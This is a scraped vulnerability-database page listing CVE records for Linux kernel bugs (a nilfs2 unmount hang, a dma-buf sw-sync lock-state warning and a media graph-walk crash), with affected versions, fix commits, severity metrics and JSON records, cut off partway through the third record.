Affected: 7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52 , < a8799662fed1f8747edae87a1937549288baca6a (git)
Affected: 7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52 , < 6e5c8e8e024e147b834f56f2115aad241433679b (git)
Affected: 7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52 , < c516db6ab9eabbedbc430b4f93b0d8728e9b427f (git)
Affected: 7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52 , < eb85dace897c5986bc2f36b3c783c6abb8a4292e (git)
Affected: c23f3a9fa7826af0465b9408b186f6b555991890 (git)
Affected: 28cd54f27d309bd65db8ff4b8e6275345287484c (git)
Affected: ec7cae16b37ab478d6d7e33e8563b24ca189e6cf (git)
Affected: d26f2dfa556323787ee1ebd5d03aeaa8650c7404 (git)
Affected: 52e87609d9d3ea34cadb5676e8ea85d025ac9632 (git)
Affected: 7bb9e4a06e12583f1418b669dc45bb3ee84496c6 (git)

Linux

Affected: 3.19
Unaffected: 0 , < 3.19 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9.3 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "LOW",
              "baseScore": 5.3,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-38582",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-20T14:52:09.028015Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-08T18:41:35.298Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:21:35.321Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/911d38be151921a5d152bb55e81fd752384c6830"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bc9cee50a4a4ca23bdc49f75ea8242d8a2193b3b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/eff7cdf890b02596b8d73e910bdbdd489175dbdb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/06afce714d87c7cd1dcfccbcd800c5c5d2cf1cfd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1c3844c5f4eac043954ebf6403fa9fd1f0e9c1c0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a8799662fed1f8747edae87a1937549288baca6a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6e5c8e8e024e147b834f56f2115aad241433679b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c516db6ab9eabbedbc430b4f93b0d8728e9b427f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/eb85dace897c5986bc2f36b3c783c6abb8a4292e"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/nilfs2/segment.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "911d38be151921a5d152bb55e81fd752384c6830",
              "status": "affected",
              "version": "7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52",
              "versionType": "git"
            },
            {
              "lessThan": "bc9cee50a4a4ca23bdc49f75ea8242d8a2193b3b",
              "status": "affected",
              "version": "7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52",
              "versionType": "git"
            },
            {
              "lessThan": "eff7cdf890b02596b8d73e910bdbdd489175dbdb",
              "status": "affected",
              "version": "7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52",
              "versionType": "git"
            },
            {
              "lessThan": "06afce714d87c7cd1dcfccbcd800c5c5d2cf1cfd",
              "status": "affected",
              "version": "7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52",
              "versionType": "git"
            },
            {
              "lessThan": "1c3844c5f4eac043954ebf6403fa9fd1f0e9c1c0",
              "status": "affected",
              "version": "7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52",
              "versionType": "git"
            },
            {
              "lessThan": "a8799662fed1f8747edae87a1937549288baca6a",
              "status": "affected",
              "version": "7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52",
              "versionType": "git"
            },
            {
              "lessThan": "6e5c8e8e024e147b834f56f2115aad241433679b",
              "status": "affected",
              "version": "7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52",
              "versionType": "git"
            },
            {
              "lessThan": "c516db6ab9eabbedbc430b4f93b0d8728e9b427f",
              "status": "affected",
              "version": "7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52",
              "versionType": "git"
            },
            {
              "lessThan": "eb85dace897c5986bc2f36b3c783c6abb8a4292e",
              "status": "affected",
              "version": "7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "c23f3a9fa7826af0465b9408b186f6b555991890",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "28cd54f27d309bd65db8ff4b8e6275345287484c",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "ec7cae16b37ab478d6d7e33e8563b24ca189e6cf",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "d26f2dfa556323787ee1ebd5d03aeaa8650c7404",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "52e87609d9d3ea34cadb5676e8ea85d025ac9632",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "7bb9e4a06e12583f1418b669dc45bb3ee84496c6",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/nilfs2/segment.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.19"
            },
            {
              "lessThan": "3.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.3",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.2.68",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.4.107",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.10.69",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.12.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.14.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.18.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix potential hang in nilfs_detach_log_writer()\n\nSyzbot has reported a potential hang in nilfs_detach_log_writer() called\nduring nilfs2 unmount.\n\nAnalysis revealed that this is because nilfs_segctor_sync(), which\nsynchronizes with the log writer thread, can be called after\nnilfs_segctor_destroy() terminates that thread, as shown in the call trace\nbelow:\n\nnilfs_detach_log_writer\n  nilfs_segctor_destroy\n    nilfs_segctor_kill_thread  --\u003e Shut down log writer thread\n    flush_work\n      nilfs_iput_work_func\n        nilfs_dispose_list\n          iput\n            nilfs_evict_inode\n              nilfs_transaction_commit\n                nilfs_construct_segment (if inode needs sync)\n                  nilfs_segctor_sync  --\u003e Attempt to synchronize with\n                                          log writer thread\n                           *** DEADLOCK ***\n\nFix this issue by changing nilfs_segctor_sync() so that the log writer\nthread returns normally without synchronizing after it terminates, and by\nforcing tasks that are already waiting to complete once after the thread\nterminates.\n\nThe skipped inode metadata flushout will then be processed together in the\nsubsequent cleanup work in nilfs_segctor_destroy()."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:36:40.840Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/911d38be151921a5d152bb55e81fd752384c6830"
        },
        {
          "url": "https://git.kernel.org/stable/c/bc9cee50a4a4ca23bdc49f75ea8242d8a2193b3b"
        },
        {
          "url": "https://git.kernel.org/stable/c/eff7cdf890b02596b8d73e910bdbdd489175dbdb"
        },
        {
          "url": "https://git.kernel.org/stable/c/06afce714d87c7cd1dcfccbcd800c5c5d2cf1cfd"
        },
        {
          "url": "https://git.kernel.org/stable/c/1c3844c5f4eac043954ebf6403fa9fd1f0e9c1c0"
        },
        {
          "url": "https://git.kernel.org/stable/c/a8799662fed1f8747edae87a1937549288baca6a"
        },
        {
          "url": "https://git.kernel.org/stable/c/6e5c8e8e024e147b834f56f2115aad241433679b"
        },
        {
          "url": "https://git.kernel.org/stable/c/c516db6ab9eabbedbc430b4f93b0d8728e9b427f"
        },
        {
          "url": "https://git.kernel.org/stable/c/eb85dace897c5986bc2f36b3c783c6abb8a4292e"
        }
      ],
      "title": "nilfs2: fix potential hang in nilfs_detach_log_writer()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38582",
    "datePublished": "2024-06-19T13:37:39.163Z",
    "dateReserved": "2024-06-18T19:36:34.928Z",
    "dateUpdated": "2026-01-05T10:36:40.840Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-38780 (GCVE-0-2024-38780)

Vulnerability from cvelistv5 – Published: 2024-06-21 11:15 – Updated: 2025-11-04 17:21

Title

dma-buf/sw-sync: don't enable IRQ from sync_print_obj()

Summary

In the Linux kernel, the following vulnerability has been resolved: dma-buf/sw-sync: don't enable IRQ from sync_print_obj() Since commit a6aa8fca4d79 ("dma-buf/sw-sync: Reduce irqsave/irqrestore from known context") by error replaced spin_unlock_irqrestore() with spin_unlock_irq() for both sync_debugfs_show() and sync_print_obj() despite sync_print_obj() is called from sync_debugfs_show(), lockdep complains inconsistent lock state warning. Use plain spin_{lock,unlock}() for sync_print_obj(), for sync_debugfs_show() is already using spin_{lock,unlock}_irq().

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/1ff116f68560a2565…
	https://git.kernel.org/stable/c/165b25e3ee9333f7b…
	https://git.kernel.org/stable/c/ae6fc4e6a3322f6d1…
	https://git.kernel.org/stable/c/9d75fab2c14a25553…
	https://git.kernel.org/stable/c/242b30466879e6def…
	https://git.kernel.org/stable/c/a4ee78244445ab73a…
	https://git.kernel.org/stable/c/8a283cdfc8beeb140…
	https://git.kernel.org/stable/c/b794918961516f667…

Impacted products

Vendor

Product

Version

Linux

Affected: a6aa8fca4d792c72947e341d7842d2f700534335 , < 1ff116f68560a25656933d5a18e7619cb6773d8a (git)
Affected: a6aa8fca4d792c72947e341d7842d2f700534335 , < 165b25e3ee9333f7b04f8db43895beacb51582ed (git)
Affected: a6aa8fca4d792c72947e341d7842d2f700534335 , < ae6fc4e6a3322f6d1c8ff59150d8469487a73dd8 (git)
Affected: a6aa8fca4d792c72947e341d7842d2f700534335 , < 9d75fab2c14a25553a1664586ed122c316bd1878 (git)
Affected: a6aa8fca4d792c72947e341d7842d2f700534335 , < 242b30466879e6defa521573c27e12018276c33a (git)
Affected: a6aa8fca4d792c72947e341d7842d2f700534335 , < a4ee78244445ab73af22bfc5a5fc543963b25aef (git)
Affected: a6aa8fca4d792c72947e341d7842d2f700534335 , < 8a283cdfc8beeb14024387a925247b563d614e1e (git)
Affected: a6aa8fca4d792c72947e341d7842d2f700534335 , < b794918961516f667b0c745aebdfebbb8a98df39 (git)
Affected: f14ad42b8743897d140808467ed4ae3ce93bd0a5 (git)

Linux

Affected: 4.14
Unaffected: 0 , < 4.14 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:21:57.330Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1ff116f68560a25656933d5a18e7619cb6773d8a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/165b25e3ee9333f7b04f8db43895beacb51582ed"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ae6fc4e6a3322f6d1c8ff59150d8469487a73dd8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9d75fab2c14a25553a1664586ed122c316bd1878"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/242b30466879e6defa521573c27e12018276c33a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a4ee78244445ab73af22bfc5a5fc543963b25aef"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8a283cdfc8beeb14024387a925247b563d614e1e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b794918961516f667b0c745aebdfebbb8a98df39"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38780",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:08:56.155586Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:44.243Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/dma-buf/sync_debug.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "1ff116f68560a25656933d5a18e7619cb6773d8a",
              "status": "affected",
              "version": "a6aa8fca4d792c72947e341d7842d2f700534335",
              "versionType": "git"
            },
            {
              "lessThan": "165b25e3ee9333f7b04f8db43895beacb51582ed",
              "status": "affected",
              "version": "a6aa8fca4d792c72947e341d7842d2f700534335",
              "versionType": "git"
            },
            {
              "lessThan": "ae6fc4e6a3322f6d1c8ff59150d8469487a73dd8",
              "status": "affected",
              "version": "a6aa8fca4d792c72947e341d7842d2f700534335",
              "versionType": "git"
            },
            {
              "lessThan": "9d75fab2c14a25553a1664586ed122c316bd1878",
              "status": "affected",
              "version": "a6aa8fca4d792c72947e341d7842d2f700534335",
              "versionType": "git"
            },
            {
              "lessThan": "242b30466879e6defa521573c27e12018276c33a",
              "status": "affected",
              "version": "a6aa8fca4d792c72947e341d7842d2f700534335",
              "versionType": "git"
            },
            {
              "lessThan": "a4ee78244445ab73af22bfc5a5fc543963b25aef",
              "status": "affected",
              "version": "a6aa8fca4d792c72947e341d7842d2f700534335",
              "versionType": "git"
            },
            {
              "lessThan": "8a283cdfc8beeb14024387a925247b563d614e1e",
              "status": "affected",
              "version": "a6aa8fca4d792c72947e341d7842d2f700534335",
              "versionType": "git"
            },
            {
              "lessThan": "b794918961516f667b0c745aebdfebbb8a98df39",
              "status": "affected",
              "version": "a6aa8fca4d792c72947e341d7842d2f700534335",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "f14ad42b8743897d140808467ed4ae3ce93bd0a5",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/dma-buf/sync_debug.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.14"
            },
            {
              "lessThan": "4.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.9.68",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndma-buf/sw-sync: don\u0027t enable IRQ from sync_print_obj()\n\nSince commit a6aa8fca4d79 (\"dma-buf/sw-sync: Reduce irqsave/irqrestore from\nknown context\") by error replaced spin_unlock_irqrestore() with\nspin_unlock_irq() for both sync_debugfs_show() and sync_print_obj() despite\nsync_print_obj() is called from sync_debugfs_show(), lockdep complains\ninconsistent lock state warning.\n\nUse plain spin_{lock,unlock}() for sync_print_obj(), for\nsync_debugfs_show() is already using spin_{lock,unlock}_irq()."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:56:57.687Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/1ff116f68560a25656933d5a18e7619cb6773d8a"
        },
        {
          "url": "https://git.kernel.org/stable/c/165b25e3ee9333f7b04f8db43895beacb51582ed"
        },
        {
          "url": "https://git.kernel.org/stable/c/ae6fc4e6a3322f6d1c8ff59150d8469487a73dd8"
        },
        {
          "url": "https://git.kernel.org/stable/c/9d75fab2c14a25553a1664586ed122c316bd1878"
        },
        {
          "url": "https://git.kernel.org/stable/c/242b30466879e6defa521573c27e12018276c33a"
        },
        {
          "url": "https://git.kernel.org/stable/c/a4ee78244445ab73af22bfc5a5fc543963b25aef"
        },
        {
          "url": "https://git.kernel.org/stable/c/8a283cdfc8beeb14024387a925247b563d614e1e"
        },
        {
          "url": "https://git.kernel.org/stable/c/b794918961516f667b0c745aebdfebbb8a98df39"
        }
      ],
      "title": "dma-buf/sw-sync: don\u0027t enable IRQ from sync_print_obj()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38780",
    "datePublished": "2024-06-21T11:15:12.892Z",
    "dateReserved": "2024-06-21T10:12:11.516Z",
    "dateUpdated": "2025-11-04T17:21:57.330Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39481 (GCVE-0-2024-39481)

Vulnerability from cvelistv5 – Published: 2024-07-05 06:55 – Updated: 2025-05-04 09:16

Title

media: mc: Fix graph walk in media_pipeline_start

Summary

In the Linux kernel, the following vulnerability has been resolved: media: mc: Fix graph walk in media_pipeline_start The graph walk tries to follow all links, even if they are not between pads. This causes a crash with, e.g. a MEDIA_LNK_FL_ANCILLARY_LINK link. Fix this by allowing the walk to proceed only for MEDIA_LNK_FL_DATA_LINK links.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/788fd0f11e45ae8d3…
	https://git.kernel.org/stable/c/e80d9db99b7b6c697…
	https://git.kernel.org/stable/c/bee9440bc0b6b3b74…
	https://git.kernel.org/stable/c/8a9d420149c477e7c…

Impacted products

Vendor

Product

Version

Linux

Affected: ae219872834a32da88408a92a4b4745c11f5a7ce , < 788fd0f11e45ae8d3a8ebbd3452a6e83f92db376 (git)
Affected: ae219872834a32da88408a92a4b4745c11f5a7ce , < e80d9db99b7b6c697d8d952dfd25c3425cf61499 (git)
Affected: ae219872834a32da88408a92a4b4745c11f5a7ce , < bee9440bc0b6b3b7432f7bfde28656262a3484a2 (git)
Affected: ae219872834a32da88408a92a4b4745c11f5a7ce , < 8a9d420149c477e7c97fbd6453704e4612bdd3fa (git)

Linux

Affected: 6.1
Unaffected: 0 , < 6.1 (semver)
Unaffected: 6.1.94 , ≤ 6.1.* (semver)
Unaffected: 6.6.34 , ≤ 6.6.* (semver)
Unaffected: 6.9.5 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39481",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-07-05T20:07:40.257709Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T20:07:53.742Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:26:15.883Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/788fd0f11e45ae8d3a8ebbd3452a6e83f92db376"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e80d9db99b7b6c697d8d952dfd25c3425cf61499"
          },
          {
            "tags": [
              "x_transferred"
            ],
